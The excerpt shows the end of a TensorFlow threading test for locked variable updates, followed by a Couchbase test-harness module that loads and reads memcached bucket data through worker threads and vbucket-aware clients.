# data race and must run without TSAN.
def testParallelUpdateWithLocking(self):
with self.test_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
adds = [
state_ops.assign_add(
p, ones_t, use_locking=True) for _ in range(20)
]
p.initializer.run()
def run_add(add_op):
sess.run(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertAllEqual(vals, ones * 20)
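# With use_locking=True each assign_add above runs under the variable's
# lock, so the 20 concurrent "+= 1.0" updates cannot interleave their
# read-modify-write and the final value is exactly 20.0 everywhere; the
# unlocked variant (see the no_tsan test referenced above) permits lost
# updates.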
# NOTE(mrry): See also
# dense_update_ops_no_tsan_test.[...].testParallelAssignWithoutLocking,
# which contains a benign data race and must run without TSAN.
def testParallelAssignWithLocking(self):
with self.test_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
assigns = [
state_ops.assign(
p, math_ops.multiply(ones_t, float(i)), use_locking=True)
for i in range(1, 21)
]
p.initializer.run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
# Assert every element is the same, and taken from one of the assignments.
self.assertTrue(vals[0, 0] > 0)
self.assertTrue(vals[0, 0] <= 20)
self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
if __name__ == "__main__":
test.main()
|
data_helper.py
|
import copy
import hashlib
import json
import random
import socket
import threading
import time
import uuid
import zlib
from multiprocessing import Process, Queue
from random import Random
import crc32
import logger
import memcacheConstants
from mc_ascii_client import MemcachedAsciiClient
from mc_bin_client import MemcachedClient, MemcachedError
from membase.api.rest_client import RestConnection, RestHelper, Bucket, vBucket
from memcacheConstants import ERR_NOT_MY_VBUCKET, ERR_ETMPFAIL, ERR_EINVAL, ERR_2BIG
from memcached.helper.old_kvstore import ClientKeyValueStore
from perf_engines import mcsoda
from TestInput import TestInputServer
from TestInput import TestInputSingleton
log = logger.Logger.get_logger()
try:
import concurrent.futures
except ImportError:
log.warning("{0} {1}".format("Can not import concurrent module.",
"Data for each server will be loaded/retrieved sequentially"))
class MemcachedClientHelperExcetion(Exception):
def __init__(self, errorcode, message):
Exception.__init__(self, errorcode, message)
self._message = message
self.errorcode = errorcode
self._args = (errorcode, message)
class MemcachedClientHelper(object):
# value_sizes {10:0.1,20:0.2:40:0.8}
@staticmethod
def create_threads(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0,
scope=None,
collection=None):
log = logger.Logger.get_logger()
if not servers:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="servers is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
if ram_load_ratio >= 0:
info = RestConnection(servers[0]).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in value_size_distribution.items():
how_many = int(space_to_fill / (size + 250) * probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}",
"payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
else:
for size, probability in value_size_distribution.items():
how_many = ((number_of_items // number_of_threads) * probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}",
"payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
for item in list:
item['how_many'] //= int(number_of_threads)
# at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
# choose one of the servers at random
thread = WorkerThread(serverInfo=MemcachedClientHelper.random_pick(servers),
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
async_write=async_write,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
scope=scope,
collection=collection)
threads.append(thread)
return threads
@staticmethod
def create_threads_for_load_bucket(serverInfo=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0,
scope=None,
collection=None):
log = logger.Logger.get_logger()
if not serverInfo:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="serverInfo is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.33, 128: 0.33, 1024: 0.33}
list = []
if ram_load_ratio >= 0:
info = RestConnection(serverInfo).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in value_size_distribution.items():
# let's assume overhead per key is 64 bytes ?
how_many = int(space_to_fill / (size + 250) * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
else:
for size, probability in value_size_distribution.items():
how_many = (number_of_items * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
for item in list:
item['how_many'] //= int(number_of_threads)
# at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
thread = WorkerThread(serverInfo=serverInfo,
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
scope=scope,
collection=collection)
threads.append(thread)
return threads
@staticmethod
def load_bucket_and_return_the_keys(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0,
scope=None,
collection=None):
inserted_keys = []
rejected_keys = []
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
scope=scope,
collection=collection)
# we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
inserted_count = 0
rejected_count = 0
deleted_count = 0
expired_count = 0
for thread in threads:
t_inserted, t_rejected = thread.keys_set()
inserted_count += thread.inserted_keys_count()
rejected_count += thread.rejected_keys_count()
deleted_count += thread._delete_count
expired_count += thread._expiry_count
inserted_keys.extend(t_inserted)
rejected_keys.extend(t_rejected)
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_count, rejected_count))
msg = "deleted keys count : {0} , expired keys count : {1}"
log.info(msg.format(deleted_count, expired_count))
return inserted_keys, rejected_keys
@staticmethod
def load_bucket(servers,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
scope=None,
collection=None):
inserted_keys_count = 0
rejected_keys_count = 0
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only,
moxi,
scope=scope,
collection=collection)
# we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
for thread in threads:
inserted_keys_count += thread.inserted_keys_count()
rejected_keys_count += thread.rejected_keys_count()
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_keys_count, rejected_keys_count))
return inserted_keys_count, rejected_keys_count
@staticmethod
def create_value(pattern, size):
return (pattern * (size // len(pattern))) + pattern[0:(size % len(pattern))]
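# Example: create_value('ab', 5) returns 'ababa' -- the pattern is tiled
# size // len(pattern) times, then padded with its first
# size % len(pattern) characters.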
@staticmethod
def random_pick(list):
if list:
if len(list) > 1:
return list[Random().randint(0, len(list) - 1)]
return list[0]
# raise array empty ?
return None
@staticmethod
def direct_client(server, bucket, timeout=30, admin_user='cbadminbucket', admin_pass='password'):
log = logger.Logger.get_logger()
rest = RestConnection(server)
node = None
try:
node = rest.get_nodes_self()
except ValueError as e:
log.info("could not connect to server {0}, will try scanning all nodes".format(server))
if not node:
nodes = rest.get_nodes()
for n in nodes:
if n.ip == server.ip and n.port == server.port:
node = n
if isinstance(server, dict):
log.info("dict:{0}".format(server))
log.info("creating direct client {0}:{1} {2}".format(server["ip"], node.memcached, bucket))
else:
log.info("creating direct client {0}:{1} {2}".format(server.ip, node.memcached, bucket))
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = RestConnection(server).get_vbuckets(bucket)
if isinstance(server, dict):
client = MemcachedClient(server["ip"], node.memcached, timeout=timeout)
else:
client = MemcachedClient(server.ip, node.memcached, timeout=timeout)
if vBuckets != None:
client.vbucket_count = len(vBuckets)
else:
client.vbucket_count = 0
bucket_info = rest.get_bucket(bucket)
# todo raise exception for not bucket_info
cluster_compatibility = rest.check_cluster_compatibility("5.0")
if cluster_compatibility is None:
pre_spock = True
else:
pre_spock = not cluster_compatibility
if pre_spock:
log.info("Atleast 1 of the server is on pre-spock "
"version. Using the old ssl auth to connect to "
"bucket.")
client.sasl_auth_plain(bucket_info.name.encode('ascii'),
bucket_info.saslPassword.encode('ascii'))
else:
if isinstance(bucket, Bucket):
bucket = bucket.name
bucket = bucket.encode('ascii')
client.sasl_auth_plain(admin_user, admin_pass)
client.bucket_select(bucket)
return client
@staticmethod
def proxy_client(server, bucket, timeout=30, force_ascii=False, standalone_moxi_port=None):
# for this bucket on this node what is the proxy ?
rest = RestConnection(server)
log = logger.Logger.get_logger()
bucket_info = rest.get_bucket(bucket)
nodes = bucket_info.nodes
if (TestInputSingleton.input and "ascii" in TestInputSingleton.input.test_params \
and TestInputSingleton.input.test_params["ascii"].lower() == "true") \
or force_ascii:
ascii = True
else:
ascii = False
for node in nodes:
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = rest.get_vbuckets(bucket)
port_moxi = standalone_moxi_port or node.memcached
if ascii:
log = logger.Logger.get_logger()
log.info("creating ascii client {0}:{1} {2}".format(server.ip, port_moxi, bucket))
client = MemcachedAsciiClient(server.ip, port_moxi, timeout=timeout)
else:
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], port_moxi, bucket))
client = MemcachedClient(server["ip"], port_moxi, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, port_moxi, bucket))
client = MemcachedClient(server.ip, port_moxi, timeout=timeout)
client.vbucket_count = len(vBuckets)
if bucket_info.authType == "sasl":
client.sasl_auth_plain(bucket_info.name,
bucket_info.saslPassword)
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
def standalone_moxi_client(server, bucket, timeout=30, moxi_port=None):
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], moxi_port, bucket.name))
client = MemcachedClient(server["ip"], moxi_port, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, moxi_port, bucket.name))
client = MemcachedClient(server.ip, moxi_port, timeout=timeout)
if bucket.name != 'default' and bucket.authType == "sasl":
client.sasl_auth_plain(bucket.name.encode('ascii'),
bucket.saslPassword.encode('ascii'))
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
def flush_bucket(server, bucket, admin_user='cbadminbucket', admin_pass='password'):
# if memcached throws OOM error try again ?
log = logger.Logger.get_logger()
retry_attempt = 5
while retry_attempt > 0:
client = MemcachedClientHelper.direct_client(server, bucket, admin_user=admin_user, admin_pass=admin_pass)
try:
client.flush()
log.info('flushed bucket {0}...'.format(bucket))
break
except MemcachedError:
retry_attempt -= 1
log.info('flush raised memcached error trying again in 5 seconds...')
time.sleep(5)
finally:
client.close()
return
class MutationThread(threading.Thread):
def run(self):
values = DocumentGenerator.make_docs(len(self.keys),
{"name": "user-${prefix}",
"payload": "memcached-json-${prefix}-${padding}",
"size": 1024, "seed": self.seed})
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = 0
for value in values:
try:
if self.op == "set":
client.set(self.keys[counter], 0, 0, value, scope=self.scope, collection=self.collection)
self._mutated_count += 1
except MemcachedError:
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
except Exception as e:
self.log.info("unable to mutate {0} due to {1}".format(self.keys[counter], e))
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
client.close()
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = counter + 1
self.log.info("mutation failed {0} times".format(self._rejected_count))
client.close()
def __init__(self, serverInfo,
keys,
op,
seed,
name='default',
scope=None,
collection=None):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.scope = scope
self.collection = collection
self.keys = keys
self.op = op
self.seed = seed
self._mutated_count = 0
self._rejected_count = 0
self._rejected_keys = []
class ReaderThread(object):
def __init__(self, info, keyset, queue, scope=None, collection=None):
self.info = info
self.log = logger.Logger.get_logger()
self.error_seen = 0
self.keyset = keyset
self.aborted = False
self.queue = queue
self.scope = scope
self.collection = collection
def abort(self):
self.aborted = True
def _saw_error(self, key):
# error_msg = "unable to get key {0}"
self.error_seen += 1
# if self.error_seen < 500:
# self.log.error(error_msg.format(key))
def start(self):
client = MemcachedClientHelper.direct_client(self.info["server"], self.info['name'], admin_user='cbadminbucket',
admin_pass='password')
time.sleep(5)
while self.queue.empty() and self.keyset:
selected = MemcachedClientHelper.random_pick(self.keyset)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.keyset.remove(selected)
key = "{0}-{1}-{2}".format(self.info['baseuuid'],
selected['size'],
int(selected['how_many']))
try:
client.send_get(key, self.scope, self.collection)
except Exception:
self._saw_error(key)
# self.log.warning("attempted to get {0} keys before they are set".format(self.error_seen))
client.close()
        # mutation? let's do two cycles: first run, then try to mutate all
        # those items and return
class WorkerThread(threading.Thread):
    # two flags: stop after x errors
    # slow down after seeing every y errors
    # values_list is a list of document generators
def __init__(self,
serverInfo,
name,
values_list,
ignore_how_many_errors=5000,
override_vBucketId=-1,
terminate_in_minutes=120,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0,
scope=None,
collection=None):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.scope = scope
self.collection = collection
self.values_list = []
self.values_list.extend(copy.deepcopy(values_list))
self._value_list_copy = []
self._value_list_copy.extend(copy.deepcopy(values_list))
self._inserted_keys_count = 0
self._rejected_keys = []
self._rejected_keys_count = 0
self._delete_ratio = delete_ratio
self._expiry_ratio = expiry_ratio
self._delete_count = 0
self._expiry_count = 0
self._delete = []
self.ignore_how_many_errors = ignore_how_many_errors
self.override_vBucketId = override_vBucketId
self.terminate_in_minutes = terminate_in_minutes
self._base_uuid = uuid.uuid4()
self.queue = Queue()
self.moxi = moxi
# let's create a read_thread
self.info = {'server': serverInfo,
'name': self.name,
'baseuuid': self._base_uuid,
'scope': self.scope,
'collection': self.collection}
self.write_only = write_only
self.aborted = False
self.async_write = async_write
def inserted_keys_count(self):
return self._inserted_keys_count
def rejected_keys_count(self):
return self._rejected_keys_count
    # smart function that gives you something you can use to get the
    # inserted keys; we should just expose an iterator instead which
    # generates the key/values on the fly
def keys_set(self):
# let's construct the inserted keys set
        # TODO: hard limit - only populate up to 2M keys (enforced by the break below)
inserted_keys = []
for item in self._value_list_copy:
for i in range(0, (int(item['how_many']))):
key = "{0}-{1}-{2}".format(self._base_uuid, item['size'], i)
if key not in self._rejected_keys:
inserted_keys.append(key)
if len(inserted_keys) > 2 * 1024 * 1024:
break
return inserted_keys, self._rejected_keys
def run(self):
msg = "starting a thread to set keys mixed set-get ? {0} and using async_set ? {1}"
msg += " with moxi ? {2}"
msg = msg.format(self.write_only, self.async_write, self.moxi)
self.log.info(msg)
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
client = None
if self.moxi:
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
except Exception as ex:
self.log.info("unable to create memcached client due to {0}. stop thread...".format(ex))
import traceback
traceback.print_exc()
return
        # keeping keys in memory is not such a good idea because we run out
        # of memory, so it is best to just keep a counter; if someone asks
        # for the keys we can give them the formula, which is
        # baseuuid-{size}-{counter} with counter between 0 and n, except for
        # those keys which were rejected
# let's print out some status every 5 minutes..
if not self.write_only:
self.reader = Process(target=start_reader_process, args=(self.info, self._value_list_copy, self.queue))
self.reader.start()
start_time = time.time()
last_reported = start_time
backoff_count = 0
while len(self.values_list) > 0 and not self.aborted:
selected = MemcachedClientHelper.random_pick(self.values_list)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.values_list.remove(selected)
if (time.time() - start_time) > self.terminate_in_minutes * 60:
self.log.info("its been more than {0} minutes loading data. stopping the process..".format(
self.terminate_in_minutes))
break
else:
# every two minutes print the status
if time.time() - last_reported > 2 * 60:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
# vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
last_reported = time.time()
for item in self.values_list:
self.log.info(
'{0} keys (each {1} bytes) more to send...'.format(item['how_many'], item['size']))
key = "{0}-{1}-{2}".format(self._base_uuid,
selected['size'],
int(selected['how_many']))
if not self.moxi:
client = awareness.memcached(key)
if not client:
self.log.error("client should not be null")
value = "*"
try:
value = next(selected["value"])
except StopIteration:
pass
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(key, 0, 0, value, self.scope, self.collection)
else:
client.set(key, 0, 0, value, self.scope, self.collection)
self._inserted_keys_count += 1
backoff_count = 0
# do expiry sets, 30 second expiry time
if Random().random() < self._expiry_ratio:
client.set(key + "-exp", 30, 0, value, self.scope, self.collection)
self._expiry_count += 1
# do deletes if we have 100 pending
# at the end delete the remaining
if len(self._delete) >= 100:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del, self.scope, self.collection)
self._delete = []
# do delete sets
if Random().random() < self._delete_ratio:
client.set(key + "-del", 0, 0, value, self.scope, self.collection)
self._delete.append(key + "-del")
self._delete_count += 1
except MemcachedError as error:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
# vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo["ip"]))
else:
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo.ip))
if error.status == 134:
backoff_count += 1
if backoff_count < 5:
backoff_seconds = 15 * backoff_count
else:
backoff_seconds = 2 * backoff_count
self.log.info("received error # 134. backing off for {0} sec".format(backoff_seconds))
time.sleep(backoff_seconds)
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
except Exception as ex:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error("error {0} from {1}".format(ex, self.serverInfo["ip"]))
import traceback
traceback.print_exc()
else:
self.log.error("error {0} from {1}".format(ex, self.serverInfo.ip))
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
# before closing the session let's try sending those items again
retry = 3
while retry > 0 and self._rejected_keys_count > 0:
rejected_after_retry = []
self._rejected_keys_count = 0
for item in self._rejected_keys:
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(item["key"], 0, 0, item["value"], self.scope, self.collection)
else:
client.set(item["key"], 0, 0, item["value"], self.scope, self.collection)
self._inserted_keys_count += 1
except MemcachedError:
self._rejected_keys_count += 1
rejected_after_retry.append({"key": item["key"], "value": item["value"]})
if len(rejected_after_retry) > self.ignore_how_many_errors:
break
self._rejected_keys = rejected_after_retry
            retry -= 1
# clean up the rest of the deleted keys
if len(self._delete) > 0:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del, self.scope, self.collection)
self._delete = []
self.log.info("deleted {0} keys".format(self._delete_count))
self.log.info("expiry {0} keys".format(self._expiry_count))
# client.close()
awareness.done()
if not self.write_only:
self.queue.put_nowait("stop")
self.reader.join()
def _initialize_memcached(self):
pass
def _set(self):
pass
def _handle_error(self):
pass
        # if the error is a memcached OOM-related error, sleep before retrying
def _time_to_stop(self):
return self.aborted or len(self._rejected_keys) > self.ignore_how_many_errors
class VBucketAwareMemcached(object):
def __init__(self, rest, bucket, info=None, scope=None, collection=None):
self.log = logger.Logger.get_logger()
self.info = info
self.bucket = bucket
if isinstance(bucket, Bucket):
self.bucket = bucket.name
self.memcacheds = {}
self.vBucketMap = {}
self.vBucketMapReplica = {}
self.rest = rest
self.reset(rest)
self.scope = scope
        self.collection = collection
def reset(self, rest=None):
if not rest:
self.rest = RestConnection(self.info)
m, v, r = self.request_map(self.rest, self.bucket)
self.memcacheds = m
self.vBucketMap = v
self.vBucketMapReplica = r
def reset_vbuckets(self, rest, vbucketids_set, forward_map=None, admin_user='cbadminbucket', admin_pass='password'):
if not forward_map:
forward_map = rest.get_bucket(self.bucket, num_attempt=2).forward_map
if not forward_map:
self.reset(rest)
forward_map = rest.get_vbuckets(self.bucket)
nodes = rest.get_nodes()
for vBucket in forward_map:
if vBucket.id in vbucketids_set:
self.vBucketMap[vBucket.id] = vBucket.master
masterIp = vBucket.master.rsplit(":", 1)[0]
masterPort = int(vBucket.master.rsplit(":", 1)[1])
if self.vBucketMap[vBucket.id] not in self.memcacheds:
server = TestInputServer()
server.rest_username = rest.username
server.rest_password = rest.password
for node in nodes:
if node.ip == masterIp and node.memcached == masterPort:
server.port = node.port
server.ip = masterIp
self.log.info("Received forward map, reset vbucket map, new direct_client")
self.memcacheds[vBucket.master] = MemcachedClientHelper.direct_client(server, self.bucket,
admin_user=admin_user,
admin_pass=admin_pass)
# if no one is using that memcached connection anymore just close the connection
used_nodes = {self.vBucketMap[vb_name] for vb_name in self.vBucketMap}
rm_clients = []
for memcache_con in self.memcacheds:
if memcache_con not in used_nodes:
rm_clients.append(memcache_con)
for rm_cl in rm_clients:
self.memcacheds[rm_cl].close()
del self.memcacheds[rm_cl]
self.vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, self.memcacheds, self.rest, self.bucket)
return True
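    # request_map builds three parallel structures: memcacheds maps
    # "ip:port" -> memcached client, vBucketMap maps vbucket id -> master
    # "ip:port", and vBucketMapReplica maps vbucket id -> the list of
    # replica "ip:port" strings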
def request_map(self, rest, bucket):
memcacheds = {}
vBucketMap = {}
vBucketMapReplica = {}
vb_ready = RestHelper(rest).vbucket_map_ready(bucket, 60)
if not vb_ready:
raise Exception("vbucket map is not ready for bucket {0}".format(bucket))
vBuckets = rest.get_vbuckets(bucket)
for vBucket in vBuckets:
vBucketMap[vBucket.id] = vBucket.master
self.add_memcached(vBucket.master, memcacheds, rest, bucket)
vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, memcacheds, rest, bucket)
return memcacheds, vBucketMap, vBucketMapReplica
def add_memcached(self, server_str, memcacheds, rest, bucket, admin_user='cbadminbucket', admin_pass='password'):
        if server_str not in memcacheds:
serverIp = server_str.rsplit(":", 1)[0]
serverPort = int(server_str.rsplit(":", 1)[1])
nodes = rest.get_nodes()
server = TestInputServer()
server.ip = serverIp
if TestInputSingleton.input.param("alt_addr", False):
server.ip = rest.get_ip_from_ini_file()
server.port = rest.port
server.rest_username = rest.username
server.rest_password = rest.password
try:
for node in nodes:
if node.ip == serverIp and node.memcached == serverPort:
if server_str not in memcacheds:
server.port = node.port
memcacheds[server_str] = \
MemcachedClientHelper.direct_client(server, bucket, admin_user=admin_user,
admin_pass=admin_pass)
# self.enable_collection(memcacheds[server_str])
break
except Exception as ex:
msg = "unable to establish connection to {0}. cleanup open connections"
self.log.warning(msg.format(serverIp))
self.done()
raise ex
def memcached(self, key, replica_index=None, scope=None, collection=None):
vBucketId = self._get_vBucket_id(key)
if replica_index is None:
return self.memcached_for_vbucket(vBucketId)
else:
return self.memcached_for_replica_vbucket(vBucketId, replica_index)
def memcached_for_vbucket(self, vBucketId):
if vBucketId not in self.vBucketMap:
msg = "vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if self.vBucketMap[vBucketId] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMap[vBucketId]))
return self.memcacheds[self.vBucketMap[vBucketId]]
def memcached_for_replica_vbucket(self, vBucketId, replica_index=0, log_on=False):
if vBucketId not in self.vBucketMapReplica:
msg = "replica vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if log_on:
self.log.info("replica vbucket: vBucketId {0}, server{1}".format(vBucketId,
self.vBucketMapReplica[vBucketId][
replica_index]))
if self.vBucketMapReplica[vBucketId][replica_index] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMapReplica[vBucketId][replica_index]))
return self.memcacheds[self.vBucketMapReplica[vBucketId][replica_index]]
def not_my_vbucket_memcached(self, key, scope=None, collection=None):
vBucketId = self._get_vBucket_id(key)
which_mc = self.vBucketMap[vBucketId]
for server in self.memcacheds:
if server != which_mc:
return self.memcacheds[server]
    # DECORATOR: retry the wrapped operation up to 5 times, refreshing the
    # vbucket map on NOT_MY_VBUCKET and on common connection errors before
    # giving up and re-raising
def aware_call(func):
def new_func(self, key, *args, **keyargs):
vb_error = 0
while True:
try:
return func(self, key, *args, **keyargs)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
return new_func
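    # Illustrative call flow for a decorated method such as get(key) below:
    #     while True:
    #         try:
    #             return self.memcached(key).get(key)
    #         except MemcachedError:  # e.g. NOT_MY_VBUCKET
    #             self.reset_vbuckets(...)  # refresh the map, retry (max 5)
    # so callers are shielded from transient vbucket-map changes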
# SUBDOCS
@aware_call
def counter_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).counter_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas,
create=create, scope=scope, collection=collection)
@aware_call
def array_add_insert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).array_add_insert_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
def array_add_unique_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).array_add_unique_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
def array_push_first_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).array_push_first_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
